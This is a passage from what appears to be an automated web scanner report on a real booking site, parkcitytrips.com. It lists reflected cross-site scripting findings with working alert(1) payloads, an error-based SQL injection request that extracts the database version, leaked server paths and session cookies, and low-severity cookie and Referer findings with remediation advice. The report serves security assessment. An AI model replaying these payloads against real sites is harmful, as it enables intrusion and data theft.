GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_comd3134'%3balert(1)//b2adc22b41e&eventID=1436&sDate=10/26/2010&eDate=10/29/2010&cloneID=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:46:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4951
Content-Type: text/html; charset=UTF-8
Connection: close

<div style="position:fixed;top:0px;left:0px;height:100%;width:100%;background:url(/images/trans_overlay.png) repeat;z-index:1;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Rate Calendar','Click'
...[SNIP]...

if(!eImgSrc&&!"") $('#calEventImg').hide();
else if(eImgSrc) $('#calEventImg').attr('src',eImgSrc);

$('iframe#calFrame').attr('src','/v002/dbase/php_ajax/price_calendar.php?sitename=parkcitytrips_comd3134';alert(1)//b2adc22b41e&event_id=1436&sDate=10/26/2010&eDate=10/29/2010&css=parkcityinfo-calendar.css');
$('iframe#calFrame').load(function(){
   $('#loadingW').hide();
   $('#calOverlay').show();
   
   try{
       var innerSDate = wind
...[SNIP]...

2.48. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The value of the cloneID request parameter is copied into the HTML document as plain text between tags. The payload 21131<script>alert(1)</script>c0f15012f2 was submitted in the cloneID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=4121131<script>alert(1)</script>c0f15012f2&eventID=1421&group_id=1293&sDate=2011-02-14&eDate=2011-02-15&deals=1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:46:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 332
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 4121131<script>alert(1)</script>c0f15012f2</i> You have an error in your SQL sy
...[SNIP]...

2.49. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The value of the eventID request parameter is copied into the HTML document as plain text between tags. The payload 97c5d<script>alert(1)</script>9a04460de71 was submitted in the eventID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=41&eventID=141897c5d<script>alert(1)</script>9a04460de71&group_id=1293&sDate=2011-02-14&eDate=2011-02-15 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:48:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 477
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Notice</b>: Undefined offset: 0 in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/php_ajax/specials.php</b> on line <b>17</b><br />
Error: A problem was encountered while executing
...[SNIP]...
<i>SELECT geolocationString FROM events WHERE id = 141897c5d<script>alert(1)</script>9a04460de71</i>
...[SNIP]...

3. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:46:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 643


<br />
<b>Warning</b>: mysql_query() [<a href='function.mysql-query'>function.mysql-query</a>]: Unable to save result set in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/trips_cla
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 12 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0th7cv2nkmuqi1ajs3h27q70g6; path=/
Connection: close
Content-Length: 372688


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

4.2. http://parkcitytrips.com/css/parkcity_template.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /css/parkcity_template.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/parkcity_template.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Jan 2011 22:00:28 GMT
ETag: "4b0918-3d77-83517700"
Accept-Ranges: bytes
Content-Length: 15735
Content-Type: text/css
Cache-control: private
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

body{background:#fff url(/images/bookdirect_images/parkcityinfo.com/ski-plow_winter.jpg) fixed no-repeat center top; font-family:Verdana,Arial,Helvetica,sans-serif;font-size:76%;margin:0 auto; text-al
...[SNIP]...

4.3. http://parkcitytrips.com/images/bookdirect_images/parkcityinfo.com/formBkg_winter.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /images/bookdirect_images/parkcityinfo.com/formBkg_winter.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookdirect_images/parkcityinfo.com/formBkg_winter.png HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 21:59:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Oct 2010 15:35:56 GMT
ETag: "1ad8281-bdf7-bf8baf00"
Accept-Ranges: bytes
Content-Length: 48631
Content-Type: image/png
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

.PNG
.
...IHDR.......g......Q~2....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS3..F.....tEXtCreation Time.10/15/10...=....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0
...[SNIP]...

4.4. http://parkcitytrips.com/images/bookdirect_images/parkcityinfo.com/search_winter.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /images/bookdirect_images/parkcityinfo.com/search_winter.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookdirect_images/parkcityinfo.com/search_winter.jpg HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 21:59:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Oct 2010 16:32:45 GMT
ETag: "1ad8291-c74-60532540"
Accept-Ranges: bytes
Content-Length: 3188
Content-Type: image/jpeg
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

......JFIF.....H.H.....C....................................................................C.........................................................................F.................................
...[SNIP]...

4.5. http://parkcitytrips.com/scripts/cal_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/cal_scripts.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/cal_scripts.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:43 GMT
ETag: "1a30bea-aa3-7676dbc0"
Accept-Ranges: bytes
Content-Length: 2723
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

// JavaScript Document

function update_hiddens(whichdate, chosenvalue) {
   var arrival, departure;
   
   if (whichdate == 'arrival') {
       arrival = new Date(chosenvalue);
   } else {
       arrival = new
...[SNIP]...

4.6. http://parkcitytrips.com/scripts/jquery-1.3.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/jquery-1.3.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery-1.3.2.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:43 GMT
ETag: "1a30bab-1d7bb-7676dbc0"
Accept-Ranges: bytes
Content-Length: 120763
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

4.7. http://parkcitytrips.com/scripts/jquery.autocomplete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.autocomplete.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:42 GMT
ETag: "4b07c4-341c-76679980"
Accept-Ranges: bytes
Content-Length: 13340
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

jQuery.autocomplete = function(input, options) {
   // Create a link to self
   var me = this;

   // Create jQuery object for input element
   var $input = $(input).attr("autocomplete", "off");

   // Apply in
...[SNIP]...

4.8. http://parkcitytrips.com/scripts/jquery.qtip-1.0.0-rc3.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/jquery.qtip-1.0.0-rc3.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.qtip-1.0.0-rc3.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 22:28:07 GMT
ETag: "4b07c3-9604-b3ea4bc0"
Accept-Ranges: bytes
Content-Length: 38404
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

/*
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks.com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Laun
...[SNIP]...

4.9. http://parkcitytrips.com/scripts/mapiconmaker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/mapiconmaker.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/mapiconmaker.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:43 GMT
ETag: "1a30be1-2453-7676dbc0"
Accept-Ranges: bytes
Content-Length: 9299
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

/**
* @name MapIconMaker
* @version 1.1
* @author Pamela Fox
* @copyright (c) 2008 Pamela Fox
* @fileoverview This gives you static functions for creating dynamically
* sized and colored mar
...[SNIP]...

4.10. http://parkcitytrips.com/scripts/sorttable.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/sorttable.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/sorttable.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:43 GMT
ETag: "1a30bb1-4217-7676dbc0"
Accept-Ranges: bytes
Content-Length: 16919
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

/*
SortTable
version 2
7th April 2007
Stuart Langridge, http://www.kryogenix.org/code/browser/sorttable/

Instructions:
Download this file
Add <script src="sorttable.js"></script> to y
...[SNIP]...

4.11. http://parkcitytrips.com/scripts/ui.core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/ui.core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/ui.core.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:42 GMT
ETag: "4b07cb-366c-76679980"
Accept-Ranges: bytes
Content-Length: 13932
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.
...[SNIP]...

4.12. http://parkcitytrips.com/scripts/ui.datepickerN.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /scripts/ui.datepickerN.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/ui.datepickerN.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: parkcitytrips.com

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:12:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 22:05:43 GMT
ETag: "1a30bde-110f7-7676dbc0"
Accept-Ranges: bytes
Content-Length: 69879
Content-Type: application/x-javascript
Cache-control: private
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close

/*
* jQuery UI Datepicker 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://d
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' 